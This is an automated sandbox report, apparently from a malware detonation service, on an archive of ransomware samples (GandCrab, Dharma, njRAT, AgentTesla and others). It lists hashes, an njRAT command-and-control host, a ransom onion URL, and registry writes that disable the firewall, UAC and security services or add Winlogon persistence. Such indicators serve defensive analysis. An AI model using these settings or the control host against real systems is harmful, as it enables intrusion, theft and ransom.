Analysis
-
max time kernel
126s -
max time network
270s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
07-11-2024 16:00
Static task
static1
Behavioral task
behavioral1
Sample
RNSM00369.7z
Resource
win10v2004-20241007-en
General
-
Target
RNSM00369.7z
-
Size
12.6MB
-
MD5
98cb8facb4fa2c24070364e766582cf5
-
SHA1
4ed374a82f019b31ca90b109d4e991868185d8d7
-
SHA256
6d33c5deccf753dfa4d754a99bda78bcf23a3e12760bea44925a555ca1aac507
-
SHA512
ff42a1be026e9c947cf9ae5ca41d0d53d9afb5117d9976f110d5a0767a1fb159437023ddc1e7c57412b38ca90d4130c21059876692eb30b07ed87931c385b4a7
-
SSDEEP
393216:AQGtqFA7phdikplEZsZ6nIj99IH6cvkV1o:7gpp/5EZpiTcMk
Malware Config
Extracted
gozi
Extracted
njrat
0.6.4
HacKed
shadowpro87.ddns.net:1177
9165950e91e4e361fa21d31cf1cfc39b
-
reg_key
9165950e91e4e361fa21d31cf1cfc39b
-
splitter
|'|'|
Extracted
F:\$RECYCLE.BIN\S-1-5-21-1045960512-3948844814-3059691613-1000\KRAB-DECRYPT.txt
http://gandcrabmfe6mnef.onion/a3e3e3c828f8a278
Extracted
C:\Program Files\Common Files\microsoft shared\MSInfo\es-ES\HOW TO RECOVER ENCRYPTED FILES.TXT
https://bitmessage.org/wiki/Main_Page
https://buy.bitcoin.com/
https://coinmonitor.io/en/
https://coinmama.com/
https://changelly.com/
https://payeer.com/
https://cex.io/
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Agenttesla family
-
Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
-
Dharma family
-
GandCrab payload 5 IoCs
resource yara_rule behavioral1/memory/5060-439-0x0000000000400000-0x0000000000B4B000-memory.dmp family_gandcrab behavioral1/memory/5060-440-0x0000000002680000-0x0000000002697000-memory.dmp family_gandcrab behavioral1/memory/8484-21753-0x00000000006B0000-0x00000000006C7000-memory.dmp family_gandcrab behavioral1/memory/8484-21752-0x0000000000400000-0x000000000044E000-memory.dmp family_gandcrab behavioral1/memory/8484-24293-0x0000000000400000-0x000000000044E000-memory.dmp family_gandcrab -
Gandcrab
Gandcrab is a Trojan horse that encrypts files on a computer.
-
Gandcrab family
-
Gozi family
-
Modifies WinLogon for persistence 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe HelpMe.exe" HEUR-Trojan-Ransom.Win32.PolyRansom.gen-00d1138e3b5ca732b50329d4e0fafa80f9bb216eefc0d4b64ba1f4eb1783fd77.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,,C:\\Users\\Admin\\AppData\\Local\\froeurte\\nxdqfudu.exe" Trojan-Ransom.Win32.Foreign.nlkp-01285beddeb7d1eee2c04c2b5c9395ccf29b460109c7d9d38276a53ec254a9d5.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Roaming\\hoax.exe" msiexec.exe -
Modifies firewall policy service 3 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" Trojan-Ransom.Win32.Foreign.nlkp-01285beddeb7d1eee2c04c2b5c9395ccf29b460109c7d9d38276a53ec254a9d5.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0" Trojan-Ransom.Win32.Foreign.nlkp-01285beddeb7d1eee2c04c2b5c9395ccf29b460109c7d9d38276a53ec254a9d5.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1" Trojan-Ransom.Win32.Foreign.nlkp-01285beddeb7d1eee2c04c2b5c9395ccf29b460109c7d9d38276a53ec254a9d5.exe -
Modifies security service 2 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" Trojan-Ransom.Win32.Foreign.nlkp-01285beddeb7d1eee2c04c2b5c9395ccf29b460109c7d9d38276a53ec254a9d5.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" Trojan-Ransom.Win32.Foreign.nlkp-01285beddeb7d1eee2c04c2b5c9395ccf29b460109c7d9d38276a53ec254a9d5.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" Trojan-Ransom.Win32.Foreign.nlkp-01285beddeb7d1eee2c04c2b5c9395ccf29b460109c7d9d38276a53ec254a9d5.exe -
Njrat family
-
Ramnit family
-
Remcos family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Trojan-Ransom.Win32.Foreign.nlkp-01285beddeb7d1eee2c04c2b5c9395ccf29b460109c7d9d38276a53ec254a9d5.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" Trojan-Ransom.Win32.Foreign.nlkp-01285beddeb7d1eee2c04c2b5c9395ccf29b460109c7d9d38276a53ec254a9d5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" Trojan-Ransom.Win32.Foreign.nlkp-01285beddeb7d1eee2c04c2b5c9395ccf29b460109c7d9d38276a53ec254a9d5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" Trojan-Ransom.Win32.Foreign.nlkp-01285beddeb7d1eee2c04c2b5c9395ccf29b460109c7d9d38276a53ec254a9d5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" Trojan-Ransom.Win32.Foreign.nlkp-01285beddeb7d1eee2c04c2b5c9395ccf29b460109c7d9d38276a53ec254a9d5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1" Trojan-Ransom.Win32.Foreign.nlkp-01285beddeb7d1eee2c04c2b5c9395ccf29b460109c7d9d38276a53ec254a9d5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" Trojan-Ransom.Win32.Foreign.nlkp-01285beddeb7d1eee2c04c2b5c9395ccf29b460109c7d9d38276a53ec254a9d5.exe -
AgentTesla payload 1 IoCs
resource yara_rule behavioral1/memory/9064-25940-0x0000000009EC0000-0x0000000009F0C000-memory.dmp family_agenttesla -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (526) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 3 IoCs
pid Process 5260 netsh.exe 6816 netsh.exe 7540 netsh.exe -
resource yara_rule behavioral1/files/0x0007000000023c81-169.dat aspack_v212_v242 behavioral1/files/0x0002000000021cc4-3207.dat aspack_v212_v242 -
Checks computer location settings 2 TTPs 64 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Blocker.hrft-bb30fd0649110b8de931a723bcf93b126a3cc72ae85997b53e706003db96d46f.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Blocker.egtr-f8311aaf01ebe54c0faa5b4b1011186c88a72d9bfe879051432885c58d8e5262.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation Yandex.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation y_installer.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Drops startup file 12 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk HEUR-Trojan-Ransom.Win32.PolyRansom.gen-00d1138e3b5ca732b50329d4e0fafa80f9bb216eefc0d4b64ba1f4eb1783fd77.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-28F8A278.[[email protected]].arrow Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-28F8A278.[[email protected]].arrow Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk HEUR-Trojan-Ransom.Win32.PolyRansom.gen-00d1138e3b5ca732b50329d4e0fafa80f9bb216eefc0d4b64ba1f4eb1783fd77.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nxdqfudu.exe Trojan-Ransom.Win32.Foreign.nlkp-01285beddeb7d1eee2c04c2b5c9395ccf29b460109c7d9d38276a53ec254a9d5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nxdqfudu.exe Trojan-Ransom.Win32.Foreign.nlkp-01285beddeb7d1eee2c04c2b5c9395ccf29b460109c7d9d38276a53ec254a9d5.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk.id-28F8A278.[[email protected]].arrow Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk.id-28F8A278.[[email protected]].arrow Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe -
Executes dropped EXE 64 IoCs
pid Process 4644 HEUR-Trojan-Ransom.MSIL.Crusis.gen-5f056a4a7aff1927cad99e70eae7fa7ed149b5b7f51c6ddd3cdc61993836be4c.exe 4960 HEUR-Trojan-Ransom.Win32.Blocker.gen-8e88dabf8ab275398f5048f337250ac7a52c637a9d435b61b8ec9cbcb6fe4a7e.exe 3812 HEUR-Trojan-Ransom.Win32.Encoder.gen-0c3b09213f642af5d6bca1708d167052f7fe198e5eced0e78584d8eb910b8d3c.exe 5060 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe 2612 HEUR-Trojan-Ransom.Win32.Generic-5fbf1d6bce0e85dd7f944b5c5c44bc38bb23357b9988aecf213cf393e8a1e92b.exe 4296 HEUR-Trojan-Ransom.Win32.Generic-5fbf1d6bce0e85dd7f944b5c5c44bc38bb23357b9988aecf213cf393e8a1e92b.exe 2664 HEUR-Trojan-Ransom.Win32.PolyRansom.gen-00d1138e3b5ca732b50329d4e0fafa80f9bb216eefc0d4b64ba1f4eb1783fd77.exe 5356 HEUR-Trojan-Ransom.Win32.Shade.gen-e37e5186abb272b2b6316ccc20beee61dec07f62ae70cad2c6c080a5cfb8f145.exe 5516 Trojan-Ransom.Win32.Autoit.ln-83a0d42ec19b724749bf833f5a03578f223f7911dc1f4f99705ec17a52d5d150.exe 5552 Trojan-Ransom.Win32.Blocker.egtr-f8311aaf01ebe54c0faa5b4b1011186c88a72d9bfe879051432885c58d8e5262.exe 5540 Trojan-Ransom.Win32.Bitman.qlg-a47717baafc3aa5eac65be9c1607925bef87397e82e94fb9a2615306acb14b13.exe 5568 Trojan-Ransom.Win32.Blocker.hrft-bb30fd0649110b8de931a723bcf93b126a3cc72ae85997b53e706003db96d46f.exe 5584 Trojan-Ransom.Win32.Blocker.ljhr-98939aa778b7528b635c5336dfd9d7a3ca292de233c2866e50408af34b211921.exe 5596 Trojan-Ransom.Win32.Blocker.ljyl-cfd34633ddda4e6dda707f48d589ebb3a226dd53d99a16b9734605e2fbf3d75e.exe 5616 Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe 5628 Trojan-Ransom.Win32.Crypmod.aatd-7a9ebb7dbb01023d06aab08743dd3af2ffa4bf86aff6bbe487f4e7f5596fc230.exe 7580 FB_8EBE.tmp.exe 6336 FB_97F6.tmp.com 7536 Trojan-Ransom.Win32.Crypmodadv.xrz-4f3db8eb6a92c35312e30f7fdcb9a963e2a8273efcf4e88cd4df01feefb8293c.exe 7844 Trojan-Ransom.Win32.Foreign.nlkp-01285beddeb7d1eee2c04c2b5c9395ccf29b460109c7d9d38276a53ec254a9d5.exe 6620 Trojan-Ransom.Win32.Foreign.oafd-3887453dd2419266bdba711d7dffabff1f7ec5b2eef4d219e0b86103566192a2.exe 6332 Trojan-Ransom.Win32.Foreign.oeth-3adfcd410678aeb41bc482ca955077c844c9b56748c7989d10ef003e0757f06c.exe 9064 Trojan-Ransom.Win32.Foreign.ogko-b846630e62ef6507d2d54b17da3fcfd395278cb33bf2bfc6b2629b0d7eff474a.exe 10072 y_installer.exe 8484 Trojan-Ransom.Win32.GandCrypt.amg-4d62bf2cec92989f49174a55334387431c96e9712f6803a1c80edf04228cb514.exe 6416 Trojan-Ransom.Win32.GandCrypt.eva-6a426cddd1e51fd4760b236919c89fb6621448de2edad195ddb39946d15e643e.exe 9596 TR6B07~1.EXE 2192 config.exe 7228 TR6B07~1.EXE 7656 TR6B07~1.EXE 5172 HEUR-Trojan-Ransom.Win32.Blocker.gen-8e88dabf8ab275398f5048f337250ac7a52c637a9d435b61b8ec9cbcb6fe4a7e.exe 8608 TR6B07~1.EXE 1616 TR6B07~1.EXE 9460 TR6B07~1.EXE 7296 TR6B07~1.EXE 3608 HEUR-Trojan-Ransom.MSIL.Crusis.gen-5f056a4a7aff1927cad99e70eae7fa7ed149b5b7f51c6ddd3cdc61993836be4c.exe 8344 TR6B07~1.EXE 9652 TR6B07~1.EXE 7420 TR6B07~1.EXE 4256 TR6B07~1.EXE 9532 TR6B07~1.EXE 7648 YandexPackSetup.exe 1984 y_installer.exe 6400 TR6B07~1.EXE 7332 TR6B07~1.EXE 9972 TR6B07~1.EXE 1456 lite_installer.exe 2812 seederexe.exe 7740 TR6B07~1.EXE 7652 Yandex.exe 6464 explorer.exe 5660 sender.exe 8788 TR6B07~1.EXE 4996 TR6B07~1.EXE 5972 TR6B07~1.EXE 7288 TR6B07~1.EXE 8036 TR6B07~1.EXE 2904 TR6B07~1.EXE 6048 TR6B07~1.EXE 8120 TR6B07~1.EXE 8076 TR6B07~1.EXE 8324 TR6B07~1.EXE 8080 TR6B07~1.EXE 5612 TR6B07~1.EXE -
Loads dropped DLL 20 IoCs
pid Process 3812 HEUR-Trojan-Ransom.Win32.Encoder.gen-0c3b09213f642af5d6bca1708d167052f7fe198e5eced0e78584d8eb910b8d3c.exe 4960 HEUR-Trojan-Ransom.Win32.Blocker.gen-8e88dabf8ab275398f5048f337250ac7a52c637a9d435b61b8ec9cbcb6fe4a7e.exe 4960 HEUR-Trojan-Ransom.Win32.Blocker.gen-8e88dabf8ab275398f5048f337250ac7a52c637a9d435b61b8ec9cbcb6fe4a7e.exe 3812 HEUR-Trojan-Ransom.Win32.Encoder.gen-0c3b09213f642af5d6bca1708d167052f7fe198e5eced0e78584d8eb910b8d3c.exe 3812 HEUR-Trojan-Ransom.Win32.Encoder.gen-0c3b09213f642af5d6bca1708d167052f7fe198e5eced0e78584d8eb910b8d3c.exe 3812 HEUR-Trojan-Ransom.Win32.Encoder.gen-0c3b09213f642af5d6bca1708d167052f7fe198e5eced0e78584d8eb910b8d3c.exe 3812 HEUR-Trojan-Ransom.Win32.Encoder.gen-0c3b09213f642af5d6bca1708d167052f7fe198e5eced0e78584d8eb910b8d3c.exe 3812 HEUR-Trojan-Ransom.Win32.Encoder.gen-0c3b09213f642af5d6bca1708d167052f7fe198e5eced0e78584d8eb910b8d3c.exe 3812 HEUR-Trojan-Ransom.Win32.Encoder.gen-0c3b09213f642af5d6bca1708d167052f7fe198e5eced0e78584d8eb910b8d3c.exe 3812 HEUR-Trojan-Ransom.Win32.Encoder.gen-0c3b09213f642af5d6bca1708d167052f7fe198e5eced0e78584d8eb910b8d3c.exe 8416 MsiExec.exe 8416 MsiExec.exe 8416 MsiExec.exe 8416 MsiExec.exe 8416 MsiExec.exe 8416 MsiExec.exe 8416 MsiExec.exe 8416 MsiExec.exe 8416 MsiExec.exe 8416 MsiExec.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 208.67.222.222 Destination IP 208.67.222.222 Destination IP 208.67.222.222 -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Uses the VBS compiler for execution 1 TTPs
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" Trojan-Ransom.Win32.Foreign.nlkp-01285beddeb7d1eee2c04c2b5c9395ccf29b460109c7d9d38276a53ec254a9d5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" Trojan-Ransom.Win32.Foreign.nlkp-01285beddeb7d1eee2c04c2b5c9395ccf29b460109c7d9d38276a53ec254a9d5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" Trojan-Ransom.Win32.Foreign.nlkp-01285beddeb7d1eee2c04c2b5c9395ccf29b460109c7d9d38276a53ec254a9d5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" Trojan-Ransom.Win32.Foreign.nlkp-01285beddeb7d1eee2c04c2b5c9395ccf29b460109c7d9d38276a53ec254a9d5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" Trojan-Ransom.Win32.Foreign.nlkp-01285beddeb7d1eee2c04c2b5c9395ccf29b460109c7d9d38276a53ec254a9d5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1" Trojan-Ransom.Win32.Foreign.nlkp-01285beddeb7d1eee2c04c2b5c9395ccf29b460109c7d9d38276a53ec254a9d5.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Trojan-Ransom.Win32.Foreign.ogko-b846630e62ef6507d2d54b17da3fcfd395278cb33bf2bfc6b2629b0d7eff474a.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Trojan-Ransom.Win32.Foreign.ogko-b846630e62ef6507d2d54b17da3fcfd395278cb33bf2bfc6b2629b0d7eff474a.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Trojan-Ransom.Win32.Foreign.ogko-b846630e62ef6507d2d54b17da3fcfd395278cb33bf2bfc6b2629b0d7eff474a.exe -
Adds Run key to start application 2 TTPs 11 IoCs
